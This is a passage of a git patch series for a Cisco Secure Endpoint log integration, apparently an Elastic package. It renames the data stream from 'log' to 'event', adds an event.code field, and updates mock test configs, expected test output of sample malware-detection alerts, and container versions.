-                "ingested": "2021-09-27T00:42:26.818553324Z",
+                "ingested": "2021-09-30T00:15:43.965574391Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583840597369422000,\"timestamp\":1610621973,\"timestamp_nanoseconds\":231000000,\"date\":\"2021-01-14T10:59:33+00:00\",\"event_type\":\"Malicious Activity Detection\",\"event_type_id\":1090519105,\"detection\":\"W32.MAP.Ransomware.rewrite\",\"detection_id\":\"6583840593074454529\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mscorsvw.exe\",\"file_path\":\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\mscorsvw.exe\",\"identity\":{\"sha256\":\"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0\",\"sha1\":\"c78f4c22dd195a1791472a2c271a0c85b53900d9\",\"md5\":\"75a758a0c5cea48c9922d64a113d0f9d\"},\"parent\":{\"process_id\":480,\"disposition\":\"Clean\",\"file_name\":\"services.exe\",\"identity\":{\"sha256\":\"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536\",\"sha1\":\"ff658a36899e43fec3966d608b4aa4472de7a378\",\"md5\":\"71c85477df9347fe8e7bc55768473fca\"}}}}}",
+                "code": "1090519105",
                 "kind": "alert",
                 "action": "Malicious Activity Detection",
                 "id": "6583840597369422000",
@@ -3430,8 +3472,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:26.818555045Z",
+                "ingested": "2021-09-30T00:15:43.965576447Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6701398782847286000,\"timestamp\":1610621970,\"timestamp_nanoseconds\":182000000,\"date\":\"2021-01-14T10:59:30+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610621970,\"start_date\":\"2021-01-14T10:59:30+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.\",\"short_description\":\"W32.PossibleRansomwareShadowCopyDeletion.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"vssadmin.exe\",\"file_path\":\"file:///C%3A/Windows/SysWOW64/vssadmin.exe\",\"identity\":{\"sha256\":\"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0\"}}}}}",
+                "code": "1107296274",
                 "kind": "alert",
                 "start": "2021-01-14T10:59:30.000Z",
                 "action": "Cloud IOC",
@@ -3516,8 +3559,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:26.818556805Z",
+                "ingested": "2021-09-30T00:15:43.965578513Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":7007136036637603000,\"timestamp\":1610621707,\"timestamp_nanoseconds\":260000000,\"date\":\"2021-01-14T10:55:07+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610621707,\"start_date\":\"2021-01-14T10:55:07+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.\",\"short_description\":\"W32.PowershellEncodedBuffer.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"file:///C%3A/Windows/system32/cmd.exe\",\"identity\":{\"sha256\":\"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536\"}}}}}",
+                "code": "1107296274",
                 "kind": "alert",
                 "start": "2021-01-14T10:55:07.000Z",
                 "action": "Cloud IOC",
@@ -3602,8 +3646,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:42:26.818558514Z",
+                "ingested": "2021-09-30T00:15:43.965580569Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1476905066250000100,\"timestamp\":1610621237,\"timestamp_nanoseconds\":250000000,\"date\":\"2021-01-14T10:47:17+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610621237,\"start_date\":\"2021-01-14T10:47:17+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Command_Line_Arguments_Kovter\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"b6:9c:d0:89:b8:66\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff\"}}}}}",
+                "code": "1107296274",
                 "kind": "alert",
                 "start": "2021-01-14T10:47:17.000Z",
                 "action": "Cloud IOC",
@@ -3688,8 +3733,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:26.818560254Z",
+                "ingested": "2021-09-30T00:15:43.965582628Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1476905066228000300,\"timestamp\":1610621237,\"timestamp_nanoseconds\":228000000,\"date\":\"2021-01-14T10:47:17+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610621237,\"start_date\":\"2021-01-14T10:47:17+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Command_Line_Arguments_Kovter\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"b6:9c:d0:89:b8:66\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.\",\"short_description\":\"W32.WinWord.Powershell\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff\"}}}}}",
+                "code": "1107296274",
                 "kind": "alert",
                 "start": "2021-01-14T10:47:17.000Z",
                 "action": "Cloud IOC",
@@ -3767,8 +3813,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:42:26.818561999Z",
+                "ingested": "2021-09-30T00:15:43.965584650Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411425813945647106\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}",
+                "code": "2164260893",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
                 "id": "6411425813945647000",
@@ -3842,8 +3889,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:42:26.818563718Z",
+                "ingested": "2021-09-30T00:15:43.965586713Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411425813945647105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}",
+                "code": "553648155",
                 "kind": "alert",
                 "action": "Retrospective Quarantine",
                 "id": "6411425813945647000",
@@ -3919,8 +3967,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:42:26.818565449Z",
+                "ingested": "2021-09-30T00:15:43.965588752Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":742000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.12081E6CA3-95.SBX.TG\",\"detection_id\":\"6411425813945647106\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"AySxs.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\AySxs.exe\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}",
+                "code": "553648147",
                 "kind": "alert",
                 "action": "Retrospective Detection",
                 "id": "6411425813945647000",
diff --git a/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-common-config.yml b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-common-config.yml
similarity index 100%
rename from packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-common-config.yml
rename to packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-common-config.yml
diff --git a/packages/cisco_secure_endpoint/data_stream/log/_dev/test/system/test-default-config.yml b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/system/test-default-config.yml
similarity index 74%
rename from packages/cisco_secure_endpoint/data_stream/log/_dev/test/system/test-default-config.yml
rename to packages/cisco_secure_endpoint/data_stream/event/_dev/test/system/test-default-config.yml
index 0b7cb39fbaf..47bbeeeca5a 100644
--- a/packages/cisco_secure_endpoint/data_stream/log/_dev/test/system/test-default-config.yml
+++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/system/test-default-config.yml
@@ -4,7 +4,8 @@ vars: ~
 data_stream:
   vars:
     preserve_original_event: true
-    url: http://{{Hostname}}:{{Port}}/v1/events?offset=0&limit=300
+    url: http://{{Hostname}}:{{Port}}/v1/events
     client_id: abcd-abcd
     api_key: xxxxxxxxxx
     ssl.verification_mode: none
+    limit: "1"
diff --git a/packages/cisco_secure_endpoint/data_stream/log/agent/stream/httpjson.yml.hbs b/packages/cisco_secure_endpoint/data_stream/event/agent/stream/httpjson.yml.hbs
similarity index 95%
rename from packages/cisco_secure_endpoint/data_stream/log/agent/stream/httpjson.yml.hbs
rename to packages/cisco_secure_endpoint/data_stream/event/agent/stream/httpjson.yml.hbs
index 8f53b5ff95f..7383fcf843c 100644
--- a/packages/cisco_secure_endpoint/data_stream/log/agent/stream/httpjson.yml.hbs
+++ b/packages/cisco_secure_endpoint/data_stream/event/agent/stream/httpjson.yml.hbs
@@ -8,8 +8,8 @@ request.ssl: {{ssl}}
 {{#if http_client_timeout}}
 request.timeout: {{http_client_timeout}}
 {{/if}}
-auth.basic.user: {{ client_id }}
-auth.basic.password: {{ api_key }}
+{{!-- auth.basic.user: {{ client_id }}
+auth.basic.password: {{ api_key }} --}}
 
 request.transforms:
 - set:
diff --git a/packages/cisco_secure_endpoint/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_secure_endpoint/data_stream/event/elasticsearch/ingest_pipeline/default.yml
similarity index 99%
rename from packages/cisco_secure_endpoint/data_stream/log/elasticsearch/ingest_pipeline/default.yml
rename to packages/cisco_secure_endpoint/data_stream/event/elasticsearch/ingest_pipeline/default.yml
index 731706d16e6..513c37c1fb5 100644
--- a/packages/cisco_secure_endpoint/data_stream/log/elasticsearch/ingest_pipeline/default.yml
+++ b/packages/cisco_secure_endpoint/data_stream/event/elasticsearch/ingest_pipeline/default.yml
@@ -51,6 +51,11 @@ processors:
     field: cisco.secure_endpoint.event_type
     target_field: event.action
     ignore_missing: true
+- convert:
+    field: cisco.secure_endpoint.event_type_id
+    target_field: event.code
+    type: string
+    ignore_missing: true
 - set:
     field: event.severity
     value: 1
diff --git a/packages/cisco_secure_endpoint/data_stream/log/fields/agent.yml b/packages/cisco_secure_endpoint/data_stream/event/fields/agent.yml
similarity index 100%
rename from packages/cisco_secure_endpoint/data_stream/log/fields/agent.yml
rename to packages/cisco_secure_endpoint/data_stream/event/fields/agent.yml
diff --git a/packages/cisco_secure_endpoint/data_stream/log/fields/base-fields.yml b/packages/cisco_secure_endpoint/data_stream/event/fields/base-fields.yml
similarity index 94%
rename from packages/cisco_secure_endpoint/data_stream/log/fields/base-fields.yml
rename to packages/cisco_secure_endpoint/data_stream/event/fields/base-fields.yml
index 130d12fe60c..b3f728b2559 100644
--- a/packages/cisco_secure_endpoint/data_stream/log/fields/base-fields.yml
+++ b/packages/cisco_secure_endpoint/data_stream/event/fields/base-fields.yml
@@ -14,7 +14,7 @@
 - name: event.dataset
   type: constant_keyword
   description: Event dataset
-  value: cisco_secure_endpoint.log
+  value: cisco_secure_endpoint.event
 - name: container.id
   description: Unique container id.
   ignore_above: 1024
diff --git a/packages/cisco_secure_endpoint/data_stream/log/fields/ecs.yml b/packages/cisco_secure_endpoint/data_stream/event/fields/ecs.yml
similarity index 98%
rename from packages/cisco_secure_endpoint/data_stream/log/fields/ecs.yml
rename to packages/cisco_secure_endpoint/data_stream/event/fields/ecs.yml
index c638cd8bfd8..a838f719ced 100644
--- a/packages/cisco_secure_endpoint/data_stream/log/fields/ecs.yml
+++ b/packages/cisco_secure_endpoint/data_stream/event/fields/ecs.yml
@@ -20,6 +20,8 @@
   name: event.category
 - external: ecs
   name: event.id
+- external: ecs
+  name: event.code
 - external: ecs
   name: event.timezone
 - name: related.ip
diff --git a/packages/cisco_secure_endpoint/data_stream/log/fields/fields.yml b/packages/cisco_secure_endpoint/data_stream/event/fields/fields.yml
similarity index 97%
rename from packages/cisco_secure_endpoint/data_stream/log/fields/fields.yml
rename to packages/cisco_secure_endpoint/data_stream/event/fields/fields.yml
index e07fffbd0b5..68cdf7aad9d 100644
--- a/packages/cisco_secure_endpoint/data_stream/log/fields/fields.yml
+++ b/packages/cisco_secure_endpoint/data_stream/event/fields/fields.yml
@@ -266,21 +266,11 @@
       description: >
         List of all MITRE tactics related to the incident found.
 
-    - name: mitre_tactics
-      type: keyword
-      description: >
-        Array of all related mitre tactic ID's
-
     - name: techniques
       type: flattened
       description: >
         List of all MITRE techniques related to the incident found.
 
-    - name: mitre_techniques
-      type: keyword
-      description: >
-        Array of all related mitre technique ID's
-
     - name: command_line.arguments
       type: keyword
       description: >
diff --git a/packages/cisco_secure_endpoint/data_stream/log/manifest.yml b/packages/cisco_secure_endpoint/data_stream/event/manifest.yml
similarity index 100%
rename from packages/cisco_secure_endpoint/data_stream/log/manifest.yml
rename to packages/cisco_secure_endpoint/data_stream/event/manifest.yml
diff --git a/packages/cisco_secure_endpoint/data_stream/log/sample_event.json b/packages/cisco_secure_endpoint/data_stream/event/sample_event.json
similarity index 100%
rename from packages/cisco_secure_endpoint/data_stream/log/sample_event.json
rename to packages/cisco_secure_endpoint/data_stream/event/sample_event.json
diff --git a/packages/cisco_secure_endpoint/docs/README.md b/packages/cisco_secure_endpoint/docs/README.md
index 211831fcb08..3ae4f33295b 100644
--- a/packages/cisco_secure_endpoint/docs/README.md
+++ b/packages/cisco_secure_endpoint/docs/README.md
@@ -3,15 +3,15 @@
 This integration is for Cisco Secure Endpoint logs. It includes the following
 datasets for receiving logs over syslog or read from a file:
 
-- `log` dataset: supports Cisco Secure Endpoint logs.
+- `event` dataset: supports Cisco Secure Endpoint Event logs.
 
 ## Logs
 
 ### Secure Endpoint
 
-The `log` dataset collects Cisco Secure Endpoint logs.
+The `event` dataset collects Cisco Secure Endpoint logs.
 
-An example event for `log` looks as following:
+An example event for `event` looks as following:
 
 ```json
 {
@@ -184,8 +184,6 @@ An example event for `log` looks as following:
 | cisco.secure_endpoint.file.disposition | Categorization of file, for example "Malicious" or "Clean". | keyword |
 | cisco.secure_endpoint.file.parent.disposition | Categorization of parrent, for example "Malicious" or "Clean". | keyword |
 | cisco.secure_endpoint.group_guids | An array of group GUIDS related to the connector sending information to AMP. | keyword |
-| cisco.secure_endpoint.mitre_tactics | Array of all related mitre tactic ID's | keyword |
-| cisco.secure_endpoint.mitre_techniques | Array of all related mitre technique ID's | keyword |
 | cisco.secure_endpoint.network_info.disposition | Categorization of a network event related to a file, for example "Malicious" or "Clean". | keyword |
 | cisco.secure_endpoint.network_info.nfm.direction | The current direction based on source and destination IP. | keyword |
 | cisco.secure_endpoint.network_info.parent.disposition | Categorization of a IOC for example "Malicious" or "Clean". | keyword |

From b7ae80a854ebe16095e44ad6447b6f3232d74b60 Mon Sep 17 00:00:00 2001
From: Alex Resnick <adr8292@gmail.com>
Date: Sat, 2 Oct 2021 13:06:33 +0000
Subject: [PATCH 7/9] bump stream container version

---
 .../_dev/deploy/docker/docker-compose.yml            |  2 +-
 .../_dev/deploy/docker/files/config.yml              | 12 ++++++------
 .../data_stream/event/agent/stream/httpjson.yml.hbs  |  4 ++--
 3 files changed, 9 insertions(+), 9 deletions(-)

diff --git a/packages/cisco_secure_endpoint/_dev/deploy/docker/docker-compose.yml b/packages/cisco_secure_endpoint/_dev/deploy/docker/docker-compose.yml
index 066c8b4bd39..faea80b2d74 100644
--- a/packages/cisco_secure_endpoint/_dev/deploy/docker/docker-compose.yml
+++ b/packages/cisco_secure_endpoint/_dev/deploy/docker/docker-compose.yml
@@ -1,7 +1,7 @@
 version: '2.3'
 services:
   cisco_secure_endpoint:
-    image: docker.elastic.co/observability/stream:v0.5.0
+    image: docker.elastic.co/observability/stream:v0.6.0
     ports:
       - 8080
     volumes:
diff --git a/packages/cisco_secure_endpoint/_dev/deploy/docker/files/config.yml b/packages/cisco_secure_endpoint/_dev/deploy/docker/files/config.yml
index 3aa55c7ad03..dc81c1d19ed 100644
--- a/packages/cisco_secure_endpoint/_dev/deploy/docker/files/config.yml
+++ b/packages/cisco_secure_endpoint/_dev/deploy/docker/files/config.yml
@@ -1,9 +1,9 @@
 rules:
   - path: /v1/events
     methods: ["GET"]
-    # request_headers:
-    # Authorization:
-    #   - "Basic YWJjZC1hYmNkOnh4eHh4eHh4eHg="
+    request_headers:
+    Authorization:
+      - "Basic YWJjZC1hYmNkOnh4eHh4eHh4eHg="
     query_params:
       offset: "1"
       limit: "1"
@@ -33,9 +33,9 @@ rules:
           }
   - path: /v1/events
     methods: ["GET"]
-    # request_headers:
-    # Authorization:
-    #   - "Basic YWJjZC1hYmNkOnh4eHh4eHh4eHg="
+    request_headers:
+    Authorization:
+      - "Basic YWJjZC1hYmNkOnh4eHh4eHh4eHg="
     query_params:
       limit: "1"
       start_date: "{start_date:\\d{4}(?:-\\d{2}){2}T(?:\\d{2})(?::\\d{2}){2}\\+00:00}"
diff --git a/packages/cisco_secure_endpoint/data_stream/event/agent/stream/httpjson.yml.hbs b/packages/cisco_secure_endpoint/data_stream/event/agent/stream/httpjson.yml.hbs
index 7383fcf843c..8f53b5ff95f 100644
--- a/packages/cisco_secure_endpoint/data_stream/event/agent/stream/httpjson.yml.hbs
+++ b/packages/cisco_secure_endpoint/data_stream/event/agent/stream/httpjson.yml.hbs
@@ -8,8 +8,8 @@ request.ssl: {{ssl}}
 {{#if http_client_timeout}}
 request.timeout: {{http_client_timeout}}
 {{/if}}
-{{!-- auth.basic.user: {{ client_id }}
-auth.basic.password: {{ api_key }} --}}
+auth.basic.user: {{ client_id }}
+auth.basic.password: {{ api_key }}
 
 request.transforms:
 - set:

From 7042c6d36911f78fd077ac6c533b06fbbf4b7a9a Mon Sep 17 00:00:00 2001
From: Alex Resnick <adr8292@gmail.com>
Date: Tue, 5 Oct 2021 14:38:53 +0000
Subject: [PATCH 8/9] bump strem version

---
 .../cisco_secure_endpoint/_dev/deploy/docker/docker-compose.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/packages/cisco_secure_endpoint/_dev/deploy/docker/docker-compose.yml b/packages/cisco_secure_endpoint/_dev/deploy/docker/docker-compose.yml
index faea80b2d74..50043908ecd 100644
--- a/packages/cisco_secure_endpoint/_dev/deploy/docker/docker-compose.yml
+++ b/packages/cisco_secure_endpoint/_dev/deploy/docker/docker-compose.yml
@@ -1,7 +1,7 @@
 version: '2.3'
 services:
   cisco_secure_endpoint:
-    image: docker.elastic.co/observability/stream:v0.6.0
+    image: docker.elastic.co/observability/stream:v0.6.1
     ports:
       - 8080
     volumes:

From f02df8dc66540a113df048c609492c87a68cf81f Mon Sep 17 00:00:00 2001
From: Alex Resnick <adr8292@gmail.com>
Date: Mon, 11 Oct 2021 13:38:40 +0000
Subject: [PATCH 9/9] move processors per comment

---
 .../event/agent/stream/httpjson.yml.hbs          | 16 +---------------
 .../elasticsearch/ingest_pipeline/default.yml    | 10 ++++++++++
 .../data_stream/event/manifest.yml               |  2 +-
 3 files changed, 12 insertions(+), 16 deletions(-)

diff --git a/packages/cisco_secure_endpoint/data_stream/event/agent/stream/httpjson.yml.hbs b/packages/cisco_secure_endpoint/data_stream/event/agent/stream/httpjson.yml.hbs
index 8f53b5ff95f..b444995992b 100644
--- a/packages/cisco_secure_endpoint/data_stream/event/agent/stream/httpjson.yml.hbs
+++ b/packages/cisco_secure_endpoint/data_stream/event/agent/stream/httpjson.yml.hbs
@@ -51,21 +51,7 @@ tags:
 {{#contains tags "forwarded"}}
 publisher_pipeline.disable_host: true
 {{/contains}}
-
-processors:
-  - decode_json_fields:
-      fields: [message]
-      target: json
-  - fingerprint:
-      fields:
-        - "json.data.timestamp"
-        - "json.data.timestamp_nanoseconds"
-        - "json.data.event_type_id"
-        - "json.data.connector_guid"
-        - "json.data.id"
-        - "json.data.detection_id"
-      target_field: "@metadata._id"
-      ignore_missing: true
 {{#if processors}}
+processors:
 {{processors}}
 {{/if}}
\ No newline at end of file
diff --git a/packages/cisco_secure_endpoint/data_stream/event/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_secure_endpoint/data_stream/event/elasticsearch/ingest_pipeline/default.yml
